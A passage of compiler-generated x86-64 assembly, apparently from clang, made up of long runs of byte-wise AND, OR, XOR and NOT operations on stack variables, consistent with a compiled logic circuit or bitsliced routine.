kill: def $al killed $al killed $eax movb %al, -166(%rbp) movzbl -1202(%rbp), %eax movzbl -1197(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -881(%rbp) movzbl -859(%rbp), %eax movzbl -1197(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -879(%rbp) movzbl -55(%rbp), %eax movzbl -60(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -16(%rbp) movzbl -400(%rbp), %eax movzbl -60(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -419(%rbp) movzbl -400(%rbp), %eax movzbl -166(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -486(%rbp) movzbl -893(%rbp), %eax movzbl -1235(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1236(%rbp) movzbl -426(%rbp), %eax movzbl -427(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -472(%rbp) movzbl -493(%rbp), %eax movzbl -497(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -742(%rbp) movzbl -249(%rbp), %eax xorl $-1, %eax movzbl -250(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -243(%rbp) movzwl -2(%rbp), %eax sarl $10, %eax andl $1, %eax movzbl -250(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -248(%rbp) movzbl -718(%rbp), %eax movzbl -723(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -724(%rbp) movzbl -158(%rbp), %eax movzbl -356(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -355(%rbp) movzbl -845(%rbp), %eax movzbl -842(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -843(%rbp) movzbl -301(%rbp), %eax movzbl -846(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -847(%rbp) movzbl -315(%rbp), %eax movzbl -316(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -317(%rbp) movzbl -667(%rbp), %eax movzbl -312(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -313(%rbp) movzbl -815(%rbp), %eax movzbl -818(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -817(%rbp) movzbl -831(%rbp), %eax movzbl -814(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -813(%rbp) movzbl -105(%rbp), %eax movzbl -692(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -696(%rbp) movzbl -956(%rbp), %eax movzbl -1011(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1010(%rbp) movzbl -82(%rbp), %eax movzbl -79(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -78(%rbp) movzbl -403(%rbp), %eax movzbl -66(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -65(%rbp) movzbl -1096(%rbp), %eax movzbl -1097(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1098(%rbp) movzbl -113(%rbp), %eax movzbl -1101(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1102(%rbp) movzbl -201(%rbp), %eax movzbl -14(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -199(%rbp) movzbl -1108(%rbp), %eax movzbl -198(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -195(%rbp) movzbl -1040(%rbp), %eax movzbl -1041(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1042(%rbp) movzbl -525(%rbp), %eax movzbl -1053(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -72(%rbp) movzbl -306(%rbp), %eax movzbl -307(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -607(%rbp) movzbl -859(%rbp), %eax movzbl -1192(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1191(%rbp) movzbl -878(%rbp), %eax movzbl -881(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -880(%rbp) movzbl -418(%rbp), %eax movzbl -16(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -13(%rbp) movzbl -248(%rbp), %eax movzbl -243(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -244(%rbp) movzbl -762(%rbp), %eax movzbl -243(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -761(%rbp) movzbl -762(%rbp), %eax xorl $-1, %eax movzbl -243(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -547(%rbp) movzbl -894(%rbp), %eax movzbl -1236(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -728(%rbp) movzbl -717(%rbp), %eax xorl $-1, %eax movzbl -724(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -721(%rbp) movzbl -157(%rbp), %eax movzbl -355(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -839(%rbp) movzbl -844(%rbp), %eax xorl $-1, %eax movzbl -843(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -840(%rbp) movzbl -300(%rbp), %eax movzbl -847(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -986(%rbp) movzbl -314(%rbp), %eax xorl $-1, %eax movzbl -317(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -966(%rbp) movzbl -668(%rbp), %eax movzbl -313(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -821(%rbp) movzbl -816(%rbp), %eax xorl $-1, %eax movzbl -817(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -820(%rbp) movzbl -832(%rbp), %eax movzbl -813(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -712(%rbp) movzbl -104(%rbp), %eax xorl $-1, %eax movzbl -696(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -702(%rbp) movzbl -955(%rbp), %eax movzbl -1010(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -74(%rbp) movzbl -83(%rbp), %eax xorl $-1, %eax movzbl -78(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -81(%rbp) movzbl -402(%rbp), %eax movzbl -65(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1094(%rbp) movzbl -1095(%rbp), %eax xorl $-1, %eax movzbl -1098(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1091(%rbp) movzbl -112(%rbp), %eax movzbl -1102(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1034(%rbp) movzbl -196(%rbp), %eax xorl $-1, %eax movzbl -199(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -200(%rbp) movzbl -632(%rbp), %eax movzbl -195(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1046(%rbp) movzbl -1039(%rbp), %eax xorl $-1, %eax movzbl -1042(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1043(%rbp) movzbl -524(%rbp), %eax movzbl -72(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -628(%rbp) movzbl -1193(%rbp), %eax xorl $-1, %eax movzbl -607(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -612(%rbp) movzbl -1194(%rbp), %eax movzbl -1191(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -694(%rbp) movzbl -879(%rbp), %eax xorl $-1, %eax movzbl -880(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -875(%rbp) movzbl -419(%rbp), %eax xorl $-1, %eax movzbl -13(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -26(%rbp) movzbl -245(%rbp), %eax movzbl -244(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -417(%rbp) movzbl -1236(%rbp), %eax movzbl -26(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -726(%rbp) movzbl -763(%rbp), %eax movzbl -761(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -971(%rbp) movzbl -894(%rbp), %eax movzbl -26(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -725(%rbp) movzbl -543(%rbp), %eax xorl $-1, %eax movzbl -547(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -270(%rbp) movzwl -2(%rbp), %eax sarl $12, %eax andl $1, %eax movzbl -547(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -542(%rbp) movzbl -355(%rbp), %eax movzbl -721(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -722(%rbp) movzbl -355(%rbp), %eax movzbl -721(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -32(%rbp) movzbl -157(%rbp), %eax movzbl -721(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -36(%rbp) movzbl -847(%rbp), %eax movzbl -840(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -841(%rbp) movzbl -847(%rbp), %eax movzbl -840(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1199(%rbp) movzbl -300(%rbp), %eax movzbl -840(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1200(%rbp) movzbl -313(%rbp), %eax movzbl -966(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -963(%rbp) movzbl -313(%rbp), %eax movzbl -966(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -466(%rbp) movzbl -668(%rbp), %eax movzbl -966(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -465(%rbp) movzbl -813(%rbp), %eax movzbl -820(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -819(%rbp) movzbl -813(%rbp), %eax movzbl -820(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1228(%rbp) movzbl -832(%rbp), %eax movzbl -820(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1208(%rbp) movzbl -1010(%rbp), %eax movzbl -702(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -706(%rbp) movzbl -1010(%rbp), %eax movzbl -702(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -76(%rbp) movzbl -955(%rbp), %eax movzbl -702(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -77(%rbp) movzbl -65(%rbp), %eax movzbl -81(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -80(%rbp) movzbl -65(%rbp), %eax movzbl -81(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -769(%rbp) movzbl -402(%rbp), %eax movzbl -81(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -770(%rbp) movzbl -1102(%rbp), %eax movzbl -1091(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1092(%rbp) movzbl -1102(%rbp), %eax movzbl -1091(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -995(%rbp) movzbl -112(%rbp), %eax movzbl -1091(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1028(%rbp) movzbl -195(%rbp), %eax movzbl -200(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -928(%rbp) movzbl -195(%rbp), %eax movzbl -200(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -464(%rbp) movzbl -632(%rbp), %eax movzbl -200(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -467(%rbp) movzbl -72(%rbp), %eax movzbl -1043(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1044(%rbp) movzbl -72(%rbp), %eax movzbl -1043(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -618(%rbp) movzbl -524(%rbp), %eax movzbl -1043(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -434(%rbp) movzbl -1194(%rbp), %eax movzbl -612(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -601(%rbp) movzbl -1194(%rbp), %eax movzbl -612(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -701(%rbp) movzbl -1191(%rbp), %eax movzbl -612(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -693(%rbp) movzbl -884(%rbp), %eax movzbl -875(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -874(%rbp) movzbl -884(%rbp), %eax movzbl -875(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -890(%rbp) movzbl -885(%rbp), %eax movzbl -875(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -892(%rbp) movzbl -1236(%rbp), %eax movzbl -26(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -20(%rbp) movzbl -894(%rbp), %eax movzbl -20(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1086(%rbp) movzbl -725(%rbp), %eax movzbl -726(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -902(%rbp) movzbl -542(%rbp), %eax movzbl -270(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -545(%rbp) movzbl -157(%rbp), %eax movzbl -722(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -727(%rbp) movzbl -1020(%rbp), %eax movzbl -270(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1015(%rbp) movzbl -1020(%rbp), %eax xorl $-1, %eax movzbl -270(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -481(%rbp) movzbl -36(%rbp), %eax movzbl -32(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -715(%rbp) movzbl -300(%rbp), %eax movzbl -841(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -838(%rbp) movzbl -1200(%rbp), %eax movzbl -1199(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1206(%rbp) movzbl -668(%rbp), %eax movzbl -963(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -991(%rbp) movzbl -465(%rbp), %eax movzbl -466(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -459(%rbp) movzbl -832(%rbp), %eax movzbl -819(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -822(%rbp) movzbl -1208(%rbp), %eax movzbl -1228(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -470(%rbp) movzbl -955(%rbp), %eax movzbl -706(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -709(%rbp) movzbl -77(%rbp), %eax movzbl -76(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -438(%rbp) movzbl -402(%rbp), %eax movzbl -80(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -75(%rbp) movzbl -770(%rbp), %eax movzbl -769(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -768(%rbp) movzbl -112(%rbp), %eax movzbl -1092(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1093(%rbp) movzbl -1028(%rbp), %eax movzbl -995(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -590(%rbp) movzbl -632(%rbp), %eax movzbl -928(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -798(%rbp) movzbl -467(%rbp), %eax movzbl -464(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -716(%rbp) movzbl -524(%rbp), %eax movzbl -1044(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1045(%rbp) movzbl -434(%rbp), %eax movzbl -618(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -624(%rbp) movzbl -1191(%rbp), %eax movzbl -601(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -603(%rbp) movzbl -694(%rbp), %eax movzbl -701(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -352(%rbp) movzbl -885(%rbp), %eax movzbl -874(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -877(%rbp) movzbl -146(%rbp), %eax movzbl -890(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -891(%rbp) movzbl -728(%rbp), %eax xorl $-1, %eax movzbl -902(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -901(%rbp) movzbl -546(%rbp), %eax movzbl -545(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1017(%rbp) movzbl -1021(%rbp), %eax movzbl -1015(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -489(%rbp) movzbl -482(%rbp), %eax xorl $-1, %eax movzbl -481(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -379(%rbp) movzwl -2(%rbp), %eax sarl $14, %eax andl $1, %eax movzbl -481(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -772(%rbp) movzbl -156(%rbp), %eax movzbl -727(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1050(%rbp) movzbl -839(%rbp), %eax xorl $-1, %eax movzbl -715(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -70(%rbp) movzbl -299(%rbp), %eax movzbl -838(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1181(%rbp) movzbl -986(%rbp), %eax xorl $-1, %eax movzbl -1206(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1205(%rbp) movzbl -993(%rbp), %eax movzbl -991(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -455(%rbp) movzbl -821(%rbp), %eax xorl $-1, %eax movzbl -459(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -460(%rbp) movzbl -825(%rbp), %eax movzbl -822(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -480(%rbp) movzbl -712(%rbp), %eax xorl $-1, %eax movzbl -470(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -469(%rbp) movzbl -806(%rbp), %eax movzbl -709(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -441(%rbp) movzbl -74(%rbp), %eax xorl $-1, %eax movzbl -438(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -439(%rbp) movzbl -405(%rbp), %eax movzbl -75(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -791(%rbp) movzbl -1094(%rbp), %eax xorl $-1, %eax movzbl -768(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -767(%rbp) movzbl -107(%rbp), %eax movzbl -1093(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1056(%rbp) movzbl -1034(%rbp), %eax xorl $-1, %eax movzbl -590(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1104(%rbp) movzbl -631(%rbp), %eax movzbl -798(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -720(%rbp) movzbl -1046(%rbp), %eax xorl $-1, %eax movzbl -716(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1125(%rbp) movzbl -527(%rbp), %eax movzbl -1045(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -220(%rbp) movzbl -628(%rbp), %eax xorl $-1, %eax movzbl -624(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -666(%rbp) movzbl -855(%rbp), %eax movzbl -603(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -699(%rbp) movzbl -693(%rbp), %eax xorl $-1, %eax movzbl -352(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -703(%rbp) movzbl -876(%rbp), %eax movzbl -877(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -272(%rbp) movzbl -892(%rbp), %eax xorl $-1, %eax movzbl -891(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -905(%rbp) movzbl -727(%rbp), %eax movzbl -901(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -264(%rbp) movzbl -772(%rbp), %eax movzbl -379(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -492(%rbp) movzbl -584(%rbp), %eax movzbl -379(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -586(%rbp) movzbl -584(%rbp), %eax movzbl -379(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -214(%rbp) movzbl -727(%rbp), %eax movzbl -901(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -51(%rbp) movzbl -156(%rbp), %eax movzbl -901(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1049(%rbp) movzbl -838(%rbp), %eax movzbl -70(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1052(%rbp) movzbl -838(%rbp), %eax movzbl -70(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1186(%rbp) movzbl -299(%rbp), %eax movzbl -70(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1180(%rbp) movzbl -991(%rbp), %eax movzbl -1205(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1204(%rbp) movzbl -991(%rbp), %eax movzbl -1205(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -457(%rbp) movzbl -993(%rbp), %eax movzbl -1205(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -456(%rbp) movzbl -822(%rbp), %eax movzbl -460(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -461(%rbp) movzbl -822(%rbp), %eax movzbl -460(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -474(%rbp) movzbl -825(%rbp), %eax movzbl -460(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -479(%rbp) movzbl -709(%rbp), %eax movzbl -469(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -478(%rbp) movzbl -709(%rbp), %eax movzbl -469(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -447(%rbp) movzbl -806(%rbp), %eax movzbl -469(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -442(%rbp) movzbl -75(%rbp), %eax movzbl -439(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -443(%rbp) movzbl -75(%rbp), %eax movzbl -439(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -781(%rbp) movzbl -405(%rbp), %eax movzbl -439(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -787(%rbp) movzbl -1093(%rbp), %eax movzbl -767(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -766(%rbp) movzbl -1093(%rbp), %eax movzbl -767(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -848(%rbp) movzbl -107(%rbp), %eax movzbl -767(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -780(%rbp) movzbl -798(%rbp), %eax movzbl -1104(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1084(%rbp) movzbl -798(%rbp), %eax movzbl -1104(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -436(%rbp) movzbl -631(%rbp), %eax movzbl -1104(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -719(%rbp) movzbl -1045(%rbp), %eax movzbl -1125(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -714(%rbp) movzbl -1045(%rbp), %eax movzbl -1125(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -215(%rbp) movzbl -527(%rbp), %eax movzbl -1125(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -217(%rbp) movzbl -603(%rbp), %eax movzbl -666(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -665(%rbp) movzbl -603(%rbp), %eax movzbl -666(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -700(%rbp) movzbl -855(%rbp), %eax movzbl -666(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -698(%rbp) movzbl -876(%rbp), %eax movzbl -703(%rbp), 